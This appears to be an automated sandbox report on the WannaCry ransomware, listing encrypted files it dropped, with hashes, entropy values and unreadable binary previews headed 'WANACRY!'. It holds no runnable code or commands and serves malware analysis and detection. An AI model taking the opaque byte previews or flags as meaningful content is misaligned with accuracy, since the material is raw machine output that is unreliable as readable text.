                                                                              Preview:WANACRY!.......?......f...v4w.i.x{.,..)T...H..O..._&.(....Cu.e[*..9\...;...........K.......c.M...%..r}..QY..V..\..:G.`[.I.......h....K....F}.....Fkw.=.Pv.M...C6b....2m%z.I~n.^..Q.[$'%..K..*..m.>...*..Gl9.]....n..q1.......~:......y.x....6.....~oy:u{.5.fK...l'...............v-.-.E[..........AO1...[.I....K.!...)!.1)-......3gm..[.^.X....} .+a.z..h........e:...8.......T.L7h..G.{...HRaZ..=.....e....HH(...L .....0.^.Vq.{h..N..E..(.G.P.?...r..@8rM....m..>..-u-M...t.3...%.'....G...z+..Y.....b..ta.../g..I...x^.!.J..b"..y...(VA..s._.....A.6..{a....v....E......O.Rw7..y...8@e@.w.T..A.....;.b..~$.l.Y.W.v.^.!..Ei........&."...??.!I.M0.J.-...a.m......Z?.....W.kekRi...?...9..l.f.~.....N....jz.[..F;bM.Y..Y..{..rL..*R6b.H..I+...z...i.|9u.u....~..AQ.8.L@.zYC$~Z#.[4x.|r@.2...Xd...m).m?.0v._..p.t..`.h..m.A....g9.kq)..mp....n....!.I..p...C......QS?....]/....... .].Fi..X`.f.n.@....!B..W...<......[./......b]....(.`..Hk...\{".!g.sEx..*q#.Y..-.u..dk.v.7.o.... .f...7.Ge.{!
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.821421613274847
                                                                              Encrypted:false
                                                                              SSDEEP:24:ma3z+07rmp8rtxcEZ0lWPGo8is9ZgR5g1qSrocjznspxy:Nj+urjzcEZY6/8BZgo1boc/spxy
                                                                              MD5:034C89831E8DB4F08DFB72280B16E46E
                                                                              SHA1:2704A8085C146BB2AABAE5EFF5116738B1FF8180
                                                                              SHA-256:01CD06A15C0046DBA2795057DE893B2F1F9FEF6D349768BE89404720605317C0
                                                                              SHA-512:5109F151D799B51E70084C410DC897FA9AF1BA0B148ACFA6970F9D30B9594EE2816928A2E9CD80DC2489E612EFFC8F6444F43719234B22579BBE4D770CF49D5B
                                                                              Malicious:false
                                                                              Preview:.-.^......M..@..#..4].....R......_v...:...]9..|..@..[...\....(z$.....[..w..*......4_.0S....r.H.#c.W...^]!......k..P.u.KJE#.$..y.}..9.D.uv._.Qp..L.%O.,.8N...O..J....b..r.f.>....C[.<.WQ&J..M...L1.....'.v..I.n..*..X>g"xff6..;W..j...D.|./..Y:../P"...C.......-F...|%..b..[.....z~."...7..r#.Q1PY.9.p..zxu.X.1..>Y.;.0..>.-.6..K.-.......U.........W..*xbe......a..K.....Z.T.K..Cw...Q..N....%B:w.....c..N(...`..yE...2.{.$.&.n...T/5...fM]....6....$:.O>....U.#'....f.?....BF9.G.O.,.gR.5...NBL..f...X....!1..d...s|c.....5.D.@X...+..v..)Q.9........r.6.........?|..=.L.ff...*d..:y.a..C....#`.?.@L?'....;..c[..m.;..w...$k.3\.%....'.+..X.W....K.?G......\..$...vA...mr3\.2F.}. ....>....{.`.H.>.o.VQ..6.3......_..O..K.....E&].UyF.....f.Q..g.."..y..`.N....?..'...x.c.#h.'..xB.i..8..:..!o..n..r..w.+[<...kL.)........e..R...qC&..L..o...._..T...'.]..v...v.E...O.g.E.L.3.$..7..^Q.2F..O*)6.P._.,bd...q.pWv.b ..m..x.F">..D....G]..~ . ...6.jl..9..M ...4....JX%........OS_.k.^..3C3
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.852050835986085
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkZAZO19623a3WGJoZ/nVNf+nLAQGYDqGustzOkVTz5Z/UTK9foEzM:bkiZOi22W/Z/VNfuAQjo8bVHf/zM
                                                                              MD5:D9D4F6FE85F45C2408E1AA6BAFFC6C45
                                                                              SHA1:9529FA2FE8582F8742E1E58EF6A0C50920C8059E
                                                                              SHA-256:0733A7D59D500D8F4C0045F839D7D5AEC50CF7935E9DB99BE6F337AF0D95CAEF
                                                                              SHA-512:CFEDF41099CCE6E980271E94781224DE8CE270A7A3271FC2181B8437BD39D480E197D1D3DD1E54C3407DBC99A3631276FD2CD1E3714A083983D7E1D43A63E8F5
                                                                              Malicious:false
                                                                              Preview:WANACRY!....I..g.3a....H...|.q.t.iC..f.d....;\....#.f......$..).R.O.b..ke3......./bu.qe..T.$?&.....Ne\.y8.....y.. .zw.0a_.e...a'7.[...s..o'..Q.g..r.p.....y..is..5...4k...g.".....u..^j...VswvU......?K..M..d....G...3....+.Ug..r[F..U.......G....!p..w|e.#.............Il....Q..r.O.1....s.F...o.....h.......T5.NqO....h.5LU...w...y...&..u ..|....VX.L.. .../...S)..H_......G..*.!.B.'..d>........ru)Q......I...Z.O.He.0P\nk6T#.T...V....n....ee.L.!.....:....Yr......M$.5.>..p../0..4......*.7.QP..T."..F=..e....E.Z....&....y_..;......+.?.p..q..{.2t...s.`}.$ .z...........c..%..J...N$.(R.p...+x.?...#.]r..t...x...y.f....{c..~J6.....5.....!2.hQ...l[.&. .....%..E.pp(VK......)...g....V.IA..k/`...B..8+...B.m.tUp..@c...MSD.l.....FW..f.e..*.M#.&.`.....Es3..L3.As....k.W..3;n:E..S.[L].Wr.v..;%<#|U8%!..v..Z.<h...Uc.?.[....-..y..Z...Oc..Zd..0....F+'.....=5...g.m....!.........b...\..Kv...l...@.K.-o..&L/..xY.....#T.\.k3..(...o0.X.^F..u4.f-.1O3..L.b.xj..s&....Y.{g...J6...!.9.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.852050835986085
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkZAZO19623a3WGJoZ/nVNf+nLAQGYDqGustzOkVTz5Z/UTK9foEzM:bkiZOi22W/Z/VNfuAQjo8bVHf/zM
                                                                              MD5:D9D4F6FE85F45C2408E1AA6BAFFC6C45
                                                                              SHA1:9529FA2FE8582F8742E1E58EF6A0C50920C8059E
                                                                              SHA-256:0733A7D59D500D8F4C0045F839D7D5AEC50CF7935E9DB99BE6F337AF0D95CAEF
                                                                              SHA-512:CFEDF41099CCE6E980271E94781224DE8CE270A7A3271FC2181B8437BD39D480E197D1D3DD1E54C3407DBC99A3631276FD2CD1E3714A083983D7E1D43A63E8F5
                                                                              Malicious:false
                                                                              Preview:WANACRY!....I..g.3a....H...|.q.t.iC..f.d....;\....#.f......$..).R.O.b..ke3......./bu.qe..T.$?&.....Ne\.y8.....y.. .zw.0a_.e...a'7.[...s..o'..Q.g..r.p.....y..is..5...4k...g.".....u..^j...VswvU......?K..M..d....G...3....+.Ug..r[F..U.......G....!p..w|e.#.............Il....Q..r.O.1....s.F...o.....h.......T5.NqO....h.5LU...w...y...&..u ..|....VX.L.. .../...S)..H_......G..*.!.B.'..d>........ru)Q......I...Z.O.He.0P\nk6T#.T...V....n....ee.L.!.....:....Yr......M$.5.>..p../0..4......*.7.QP..T."..F=..e....E.Z....&....y_..;......+.?.p..q..{.2t...s.`}.$ .z...........c..%..J...N$.(R.p...+x.?...#.]r..t...x...y.f....{c..~J6.....5.....!2.hQ...l[.&. .....%..E.pp(VK......)...g....V.IA..k/`...B..8+...B.m.tUp..@c...MSD.l.....FW..f.e..*.M#.&.`.....Es3..L3.As....k.W..3;n:E..S.[L].Wr.v..;%<#|U8%!..v..Z.<h...Uc.?.[....-..y..Z...Oc..Zd..0....F+'.....=5...g.m....!.........b...\..Kv...l...@.K.-o..&L/..xY.....#T.\.k3..(...o0.X.^F..u4.f-.1O3..L.b.xj..s&....Y.{g...J6...!.9.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.8126474718219665
                                                                              Encrypted:false
                                                                              SSDEEP:24:2Ri/Skm0WoMN5POPbU3Ggg7OQQKjcFMODNFO9gb5Gn4Y:2avN5MNFOPsGggq31MsN0SK
                                                                              MD5:D900E6DE12FD6549CB74D804EA57C90E
                                                                              SHA1:0354450C4CA20EA8BFB008791D4E4B89AC56CA06
                                                                              SHA-256:CE4ED7F42FE2ED81DFF57B8997948B56A299C1E89FE1F45A098A86E4191CC633
                                                                              SHA-512:80295BE586CB6E31E6B3EBF6A6B66C9CE244730C3A6068F09356FCC89C295FD30E5B3023C9AAD62FFC15AA11C3DB9A6067E61DAA61CFC6F8E1AB702BFF2080E4
                                                                              Malicious:false
                                                                              Preview:.-...,...j.....G".Q9..S..-.g:+w../...u.D.E{...7..B...b@.eXZ.}..d.bpMMBn. ...3....8.c3..kr..B.jU.\.z}O..9Y......c.&g.4..<myy.~n.......9g.g.....B..]..6C.u.v..1:brj11.w)]96.^.s...].Iy.6=Tj.1....T....K...x.....C..@.,tO....m.....<.V..d2)*+D{.].r.y-...v.,q.......\._.t..,.`.h7.E.u...2..=0.e....b_.....y&NJ6..W..y..n...v.D.......5N...[...).....4F.a=.7.cNs&j..p...=U.....*8.....+...G..&.5...t+.,c.B;.C..J..w...2..8.......A.Q. E..Qu...W..t.{f..K..%R..$..'...s.........[..i.r.O..-m1.....~'.C...TZ.4..9..0H.....G.'..W.X...%.]b..w...n..}.9..x.%.T.K..........Xm....qi/3.]...0sNJ.....;.F..Z=..L\..;D./K..%..gyw.K.#..F...E..I...r.N&F'.Q`.f.........b{N..i..(.PUc..Z\...........h2]J......H...k..4E| .N.'. .^V'..fc..B..@9g...J....b....m...m......AX$....F.....lzr...~..s.^P..B....W_..pN.X.WpD..1.0.1~..B...;KV.m.nB..k..h<.q..6...<..Gp.m..=...O..L..T.....B.V.r*.[.`:....m.:...V.^... ,..?.....=....O|1..J..."..P..Q...P.om5..Y8Np9v=..x<....G.&..x.(]...-*."......?...D.[H..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8204821755204685
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkfZAqlUk8USwwMa/CuVEB3ME8/LfwEuF1zpRP2+FAFFdpQtbTAmKm3l/a:bkhl6WwyNkLl2pRu+FATwuYl/a
                                                                              MD5:9D2111E4677DF2DF51CCDB07949E7266
                                                                              SHA1:CDBED5540215BBCD8F4FA191DC93B5D256207376
                                                                              SHA-256:B40EC4193E8D5ACBA62DF1C517C578F4E61AABA0E7382C7256895A34013CEA81
                                                                              SHA-512:520A17ECBB959C8B78372F871F5EBFA98ECC4D3768018E752AFA1E97F315BFA9B5596E18258A5284E95753585CAAC8C871DAEC35E6CA255A5D98F312641095D7
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......x..n..,......x.. D.......k...5XA...i..sj8.7.....}b.......R].....,..Vz.u.[.K..`m%..mO...*.....;.<B...Z...i......l...b..[b9.p`.^r.J~...Y...H.%yP....<..B.}.v...oh.V.........tW..#N...e%W....A.:8...F.e....^.uI.2f.......#.~..&.....:.......kE...............S.......A..GzS.....5..........8.i.}..Rhx..6..lh...........]w..#..[.wz....\.l.n.,...c.b.K. x....d.......j..4|EM.M-..I....'W%..s.]}.../.c.E.o.I.e...d..pb..c.pl.+...bJ......^l.........bJ.....%.~x.V...........?j.&4.........n1.....l!.U<..=t.......y....d...*6W..4.Aj.r..[%..~.b.$4....G.=..1..$.$k..\.F.U.^..h....L.G..&.y .."l.i....B....!..W..R..g.v. .o.r..yQ...xW\..M.E.p..i.I0}|...AF`Hr...U...Qk._;.G......I.[~./`...oW.8...z. .../.mHV....Pl&..........Iu....8../..Zp..{Q{W]y.0.2.9....V.~...$T..Y.s.L.y....o....F.?..xo,....k.......`.%.(./3.G2..h.J.|.W`S}......]..R.L..7..r[....4.H...............8.#^[.*t.'...c?.x]..d.".;...G45.`.@.I...F..Z...J`X....>..I-..".,i.W@.dQP.......q...M.....;....@G.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8204821755204685
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkfZAqlUk8USwwMa/CuVEB3ME8/LfwEuF1zpRP2+FAFFdpQtbTAmKm3l/a:bkhl6WwyNkLl2pRu+FATwuYl/a
                                                                              MD5:9D2111E4677DF2DF51CCDB07949E7266
                                                                              SHA1:CDBED5540215BBCD8F4FA191DC93B5D256207376
                                                                              SHA-256:B40EC4193E8D5ACBA62DF1C517C578F4E61AABA0E7382C7256895A34013CEA81
                                                                              SHA-512:520A17ECBB959C8B78372F871F5EBFA98ECC4D3768018E752AFA1E97F315BFA9B5596E18258A5284E95753585CAAC8C871DAEC35E6CA255A5D98F312641095D7
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......x..n..,......x.. D.......k...5XA...i..sj8.7.....}b.......R].....,..Vz.u.[.K..`m%..mO...*.....;.<B...Z...i......l...b..[b9.p`.^r.J~...Y...H.%yP....<..B.}.v...oh.V.........tW..#N...e%W....A.:8...F.e....^.uI.2f.......#.~..&.....:.......kE...............S.......A..GzS.....5..........8.i.}..Rhx..6..lh...........]w..#..[.wz....\.l.n.,...c.b.K. x....d.......j..4|EM.M-..I....'W%..s.]}.../.c.E.o.I.e...d..pb..c.pl.+...bJ......^l.........bJ.....%.~x.V...........?j.&4.........n1.....l!.U<..=t.......y....d...*6W..4.Aj.r..[%..~.b.$4....G.=..1..$.$k..\.F.U.^..h....L.G..&.y .."l.i....B....!..W..R..g.v. .o.r..yQ...xW\..M.E.p..i.I0}|...AF`Hr...U...Qk._;.G......I.[~./`...oW.8...z. .../.mHV....Pl&..........Iu....8../..Zp..{Q{W]y.0.2.9....V.~...$T..Y.s.L.y....o....F.?..xo,....k.......`.%.(./3.G2..h.J.|.W`S}......]..R.L..7..r[....4.H...............8.#^[.*t.'...c?.x]..d.".;...G45.`.@.I...F..Z...J`X....>..I-..".,i.W@.dQP.......q...M.....;....@G.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.819495440606118
                                                                              Encrypted:false
                                                                              SSDEEP:24:JU0VRcfDpvVQTr4I3NaGMKHKzbLMtHPZLp2fgXTfZiUYvX:JPKfRVGr4IknjgjhU
                                                                              MD5:D23357B6CBE89BF5DC9BDC465C9A726A
                                                                              SHA1:9984000730CA88B18060194764A9A670B61E8642
                                                                              SHA-256:98873BAEFE803838B1E370A5C4A85D5CA7457338A3A83FCDB942B9DBBC1BDE67
                                                                              SHA-512:827F7DAF9C372F44977E802DA926B2FB941CFCA016C1EF9025C55FB8A71307754C9585256887B925CF01613155A52BBFEACCDEE0F2DC020FCC0E7BA8D92D6617
                                                                              Malicious:false
                                                                              Preview:5J..3.b....2......,......(eG..O...z`.4TdB....\._7.j...o'....]....{.'.z.XDM.t..W.....e..*q..>A..iT.F...m?.$j.{!)...a.+y.F#...S).`56....-.l........i...1.]A..&,*..h...X...:.Y..,..[.".0.cia...z2...P..v.nN..U.`$@L.r.]....4..^......g.c...%.....g.6...|....t.......<...b4F%...#......."#.C...nZ.1,d.:..5....._...Ul.N..].Z..d...#........T. ..?_.E.C.w....+....l.$........b.$.?V...`.s...^......<..m.{+Y.T...u..y......n#Rg.x...H..t..8.!....U.U.g..Dq.....".w....I/|.......yqX...9..R.ef>.....m.et*......z?.z$Z..{.bwx.r.h.....{.Uf.D..*G.K....!..hg...o..Yl.}.(eo..5(|;...^B....&...9......1..B&.......)..lw.B.K.B.Y.3+.....0...3..qJ2. ...0..G.oQ7BP...1._..J.5....)p....-..).$.-.....q.]{\.......#..@A....H'.l.4wi.@d.m.~..........4.....X...Y."..V.O.d..~c.7].q...e.M;.@....B..E..'...........j....\.W.n.:.!r.Q..:.......L..dS.............fm...N*.t.Y..[..(+U..H.....A....pS9....kR....f.A^...\......]`..\.v.{..~n.%0.a....<__...bW....7...H*..Z..n<.>....p..K-.w.s#....A...Q.C...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8527002997067274
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkPxJOxus5KjcUfnaIzyrsLu36qpR4CH05mAEqtflbcMbIO2JqSCmX7nI/YmuWa1:bkJ0osUQUfaIus2h0Eqt9bVsdJqKyPa1
                                                                              MD5:77131373394322DBEF9DF3965ECAD0E8
                                                                              SHA1:17A3E30A0144A7F8E235C1B674DD1502D26C1A02
                                                                              SHA-256:6A3FC06394871A3F69B6E1E2C9489F4A5E526F634E903078E7C962DDEB555CD1
                                                                              SHA-512:810FEE5A1BC217C0AB1456C17A5BB2C6363CB8BCAEE85E350C4BCACB4E4F193645BD11AD2DBC673FFC09E12D77FC322F988FE240E5D5112CBE6905612209A7E9
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....1.......X..T.8..$?.e.!..@.6...f%..c0.....o....C....P../..i.p.W.h....._..D..X..Cg.&uf...6N7B8......P..g.pkEo[.s!v.....W..]PA.t..$...w...q`.k..J./Ee.....lY^...6.5.....ly.!Z[.7..N ....V..y.......W.a..0...A.g}.....}..<K...E.....T.o..f.@x.z$...Fp............S...x.....;C..S1A.NG..........<...D..W.........h.p...}.X.][yQ.$<..\.a.9.:.NH:G..v.b..T..KZ...H...c,x$.....+%...v.Y...O..)Tv.A.....1Nl.......8..er.j).O".q..|o'D...E..p....e....=..oB....iXr..!d..V.....J._."9...-..iD.|.......~&..'.EI......u.$z.....Jb.~uu..B..W...-M.GQ.]3Qn...O.y./..h._...#...enj ...v........g.z.NW.0..+TB+v....,..w.k?.b.w...J.t.....u..#|T........%.R...PL......R..'...[@c.x.z....n........6..1......]...+P+.|Ee....C4CM../..O|Db.S...2.E...em.o@......N3b.`l.H.........5..)&T[]..0r.5...j......Dk.t,.h.[M*..4...=o.......,...A...d.?.b+....c..E.w.oG.WH.....B..R..;fE4....{.i.@S..\Yr.....H..F..y.P......fO..].'k.'w.,.JO-..~...".e.=...pX9.&.ww.....k4..n9..n.1....k..&.-.b..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8527002997067274
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkPxJOxus5KjcUfnaIzyrsLu36qpR4CH05mAEqtflbcMbIO2JqSCmX7nI/YmuWa1:bkJ0osUQUfaIus2h0Eqt9bVsdJqKyPa1
                                                                              MD5:77131373394322DBEF9DF3965ECAD0E8
                                                                              SHA1:17A3E30A0144A7F8E235C1B674DD1502D26C1A02
                                                                              SHA-256:6A3FC06394871A3F69B6E1E2C9489F4A5E526F634E903078E7C962DDEB555CD1
                                                                              SHA-512:810FEE5A1BC217C0AB1456C17A5BB2C6363CB8BCAEE85E350C4BCACB4E4F193645BD11AD2DBC673FFC09E12D77FC322F988FE240E5D5112CBE6905612209A7E9
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....1.......X..T.8..$?.e.!..@.6...f%..c0.....o....C....P../..i.p.W.h....._..D..X..Cg.&uf...6N7B8......P..g.pkEo[.s!v.....W..]PA.t..$...w...q`.k..J./Ee.....lY^...6.5.....ly.!Z[.7..N ....V..y.......W.a..0...A.g}.....}..<K...E.....T.o..f.@x.z$...Fp............S...x.....;C..S1A.NG..........<...D..W.........h.p...}.X.][yQ.$<..\.a.9.:.NH:G..v.b..T..KZ...H...c,x$.....+%...v.Y...O..)Tv.A.....1Nl.......8..er.j).O".q..|o'D...E..p....e....=..oB....iXr..!d..V.....J._."9...-..iD.|.......~&..'.EI......u.$z.....Jb.~uu..B..W...-M.GQ.]3Qn...O.y./..h._...#...enj ...v........g.z.NW.0..+TB+v....,..w.k?.b.w...J.t.....u..#|T........%.R...PL......R..'...[@c.x.z....n........6..1......]...+P+.|Ee....C4CM../..O|Db.S...2.E...em.o@......N3b.`l.H.........5..)&T[]..0r.5...j......Dk.t,.h.[M*..4...=o.......,...A...d.?.b+....c..E.w.oG.WH.....B..R..;fE4....{.i.@S..\Yr.....H..F..y.P......fO..].'k.'w.,.JO-..~...".e.=...pX9.&.ww.....k4..n9..n.1....k..&.-.b..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.7788343210315
                                                                              Encrypted:false
                                                                              SSDEEP:24:sL0DJyEYNO3rkGHiN7HC+HO2eSf7piNh622W5tl8zdcWWbMLW7ualTt:sYJy1N6Xq7H9u6faIWHiCbL7/lZ
                                                                              MD5:69D27AA86CF0DEBED4A6663D8C67F267
                                                                              SHA1:0BD4EAFCF9B48EAEF1A87FBA6DB051835D5DF35E
                                                                              SHA-256:D11BAEBB8FCC94D98F51AA27E8174F16B923F1F1896975276B8CF269103BB33E
                                                                              SHA-512:75DFCF12B570902086003E91161C208FD9CFFA747FE7CB48A2C0F91E7DD33287A8364560D684F3354C037B4FE9A3148F9E13C355965D734EF6237F7D224622BF
                                                                              Malicious:false
                                                                              Preview:Q.W.p.j.m..0.p....0.....\$.....|..U_..^MK.......Zw..ZH.......;._|2..3f.Eep3..C.X;..!q.Iq4...Q][.y$L./_.`t...[@q...>J...Q..N00...+b......;1.Ir....i..ft.}.C:.................M......Z.1....K...Jc.4....." .n...\+.>..(..Q...r...[.O..~....l.......P.........1....Z.^.}..u...-.....*.M...}..;.3vn3;........%.P..-..^...0.?.l..?N....j4#*..u<....&...[Q.}...QF.q.5l3P5_`!.R.."w.!.V.d.[..8..l...w..........Vy.......Z...i.>.#....X....9.....+....e..q4.$..f;..Iy)...n.}SS.k.Tf.!.u...C...k.<......o.cZ......WW/.eZ.J.) _w...u....B.Ih..A$>#/\.%................(w2..H.P...0I.V"Xy...$.....(.+..1...=..;cF`...y.1.......!d...W.I.D...3.7..Z...ID.....:.2....f(\C........F2P..[.c6...%.].%._*....C..N....b... ..... 7.}m.C....._.K...3$.wd.......DF..F&.|)..8..~R.i|I.>n..m...3.......2.y...u.$B..*..M.`..Kk^...b)i.^.".F.[..F3j.~...\^.j\.....%,K..T.3...k/sgX..@.LJ.6G..R.5m...fw.Z.d+9..a..*..>3C...f.4j!.W9..4.V...6...>.y.O{BM._...L.RM.8K......=........y.y<....mB.=fc.@>X3...^.t
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.831252480986066
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk0X/sKvk8k6w53QF/HPh6KMknPDeRogvN77tg/PovpA0kKkbRYCb7RrVVqvHpU:bk0vsKtk6wavPh6KVPDVgl2oIRbBRriC
                                                                              MD5:22CB02F3E30D221CDE4F54D1142F32A0
                                                                              SHA1:2B9C5EACCAF4F4ED7F1E0482B902635B7C4105E0
                                                                              SHA-256:AD1B9BD00ED24C1E4890D0D6DB9C482D5B69336A6FD23B9C11EC86E02A0EEDB0
                                                                              SHA-512:86A79A7EF37867EE83B22AC9EC132C79DCC31A1C55A6FDD937E307762B019660FE6887D6BC0B03EC453384101B2C72E68CCA8295AB819B0B2992A7025EAA0648
                                                                              Malicious:false
                                                                              Preview:WANACRY!....-@..{..wbv.m.M...~`.?eDW..b..A....?)/...._=........+MI...8~....cw$.Fxs.z...a*.6.v..Z.r.......y|...kV.G*.\._2....._3b...O5B.p..W.JA..y.J.._.{D..'hfa...2.9....}8).h...$.....2c........+....&.V&A.N....^..W....6.#..WA.........d...6.q'..<e....2...................=f..2rz?.:...$.,...p..].7.U...........0..B.... .j..u.......H^.`(4G...6:7.......OE..:|...s>...C....E2@jd.Y...tH..6.._..................n9.?........-G...t...c..M...L..{|.....#z..@.._.7_.s...U..J..T.f,......XX.4.....%.]S<.?..;ze..E;rO.i.d..+.E....i..b.zaH...g..:..dx0... H.e(..D_q..E.YI...+.....xe..?A...M..C....l2....<(.Ci'..p....%...7W6...?.^.._..et......J..UN...By/.o..!?Yi=n:.l?....f6.[$.4..(P..{G.8._....<}..z..SF..P/..N.Q..mX..Sc..".....h-......e.e.4;.Ov...O^.C`s=&.. #)x\.<...N...=.\0.&..GY.:|.!.F:ZD.....9Us(..4q. .....;....f.`......cD....]%.,...R.RJ..r...%.w.=....<(.7.+.Hc. Cz..X8O..&U.h.'...v.Y...!.F.{.....4.j.........A.9........3......e....U~..KXO..+..J{|8.M.1B.o\A=?.._....[..m
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.831252480986066
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk0X/sKvk8k6w53QF/HPh6KMknPDeRogvN77tg/PovpA0kKkbRYCb7RrVVqvHpU:bk0vsKtk6wavPh6KVPDVgl2oIRbBRriC
                                                                              MD5:22CB02F3E30D221CDE4F54D1142F32A0
                                                                              SHA1:2B9C5EACCAF4F4ED7F1E0482B902635B7C4105E0
                                                                              SHA-256:AD1B9BD00ED24C1E4890D0D6DB9C482D5B69336A6FD23B9C11EC86E02A0EEDB0
                                                                              SHA-512:86A79A7EF37867EE83B22AC9EC132C79DCC31A1C55A6FDD937E307762B019660FE6887D6BC0B03EC453384101B2C72E68CCA8295AB819B0B2992A7025EAA0648
                                                                              Malicious:false
                                                                              Preview:WANACRY!....-@..{..wbv.m.M...~`.?eDW..b..A....?)/...._=........+MI...8~....cw$.Fxs.z...a*.6.v..Z.r.......y|...kV.G*.\._2....._3b...O5B.p..W.JA..y.J.._.{D..'hfa...2.9....}8).h...$.....2c........+....&.V&A.N....^..W....6.#..WA.........d...6.q'..<e....2...................=f..2rz?.:...$.,...p..].7.U...........0..B.... .j..u.......H^.`(4G...6:7.......OE..:|...s>...C....E2@jd.Y...tH..6.._..................n9.?........-G...t...c..M...L..{|.....#z..@.._.7_.s...U..J..T.f,......XX.4.....%.]S<.?..;ze..E;rO.i.d..+.E....i..b.zaH...g..:..dx0... H.e(..D_q..E.YI...+.....xe..?A...M..C....l2....<(.Ci'..p....%...7W6...?.^.._..et......J..UN...By/.o..!?Yi=n:.l?....f6.[$.4..(P..{G.8._....<}..z..SF..P/..N.Q..mX..Sc..".....h-......e.e.4;.Ov...O^.C`s=&.. #)x\.<...N...=.\0.&..GY.:|.!.F:ZD.....9Us(..4q. .....;....f.`......cD....]%.,...R.RJ..r...%.w.=....<(.7.+.Hc. Cz..X8O..&U.h.'...v.Y...!.F.{.....4.j.........A.9........3......e....U~..KXO..+..J{|8.M.1B.o\A=?.._....[..m
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.8208721349703465
                                                                              Encrypted:false
                                                                              SSDEEP:24:rL+r6KxPYOoEanH4dHjwka9yiGSqYaNf0+jrn2yoo4FQQOGICxA3pO:/nOM3nHw5aEiRqYaNoBQwICxz
                                                                              MD5:A01764D463FAEA7DC913E30091F464F1
                                                                              SHA1:7EC03727CF3035D2B959B3404619BB98D1B88A4E
                                                                              SHA-256:B079D5CFE8E5F7FC502EBC4D718E1B1D91D2E4C63F29E4423ECE92E46E847387
                                                                              SHA-512:D91AE36B4FD7FCE5A62FDDCE7359058B17CCE26E6BF939FB8A86F361DC5E810E61BF65806D9B90470A44C56C8A7E676243C8ED1F16E2490E328C098932FCB4EB
                                                                              Malicious:false
                                                                              Preview:N9Q..`j.Z....'m0B..#...%6W.l.5......8..Y....6..\...#.t.N..'iHH.:uIKI....Q......6......^2f.......PS. ..!N...........S.n*.b...M.g..t..."....(..M.._.)..X...[a1....Tf....e...h0......A.f...^....<C.......:..[..;<...ii......zy.oH0..(.u.Q..7...a}.`....%.Q....e..K.."...o.....a=Ba.u....we.@.!..Xf..3.5......3C]...3......%.S0...kg.$.6....c9=d.....*U..69.."Fl.E.ej.O..7.......?...ZO'...R...V.&.|.......... .7...u.EL..D..^.s.j....[.M...x...V.#.LH.x..( .W..4....E.f.&..^A.."....a..N..[.[t....BY.el.l*.g.E-...+.....x..]/.k..f.c...}3.1.E..^Q.$..5.z....\.._.%Q\g...l..o.?..J*.0.~pG.j..,<YN]#|g...Ws.R.d ...w..a..d......S'^\.L.3.:....[.....-.!_...|.............AN2/....?<=.......3...5?H..w.R-z....s2..!...i..9.\..\.uh.R.G..-.#)....A......S.P...'..F.............4q..Lq_....a.......*.r`h.D...<....7Z....m.....9}..%:.L....$.......W..2..4.+.......D.-..[..:.O.U._.$.w|.....(...M.v<......0Op&.'.>.:....o.=c.|.5d...c.N..&N..b..]Q../>e&..\n...SQ..<.L.B...Fq.9.."...i
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.849159359534632
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk/XrazHy/1LFHo8HG5Zv+1xqOTHr9WI4iKlsuLE92I4x5ZEZQcNMJb8fE0BNZ/9:bk/2DKLVlGbv+1gcL9WI43l7Y1GECCMQ
                                                                              MD5:D0F43CD640678E9855C48427A2C678B1
                                                                              SHA1:080AF92CCC089273EC48F03AD7037621598EB925
                                                                              SHA-256:1D1D00BCBDADE36248EF59C7986B352D78E901CC666023F73887A5860D020EF1
                                                                              SHA-512:2B3A571D9DB6A1269B3D92554B84C60E0E55289E78171792D4EB4A6F531FE5B1225E0C98C5CDB51E2B283E6837CAF0BCF194CFAABE55AF4409D51075B17722BD
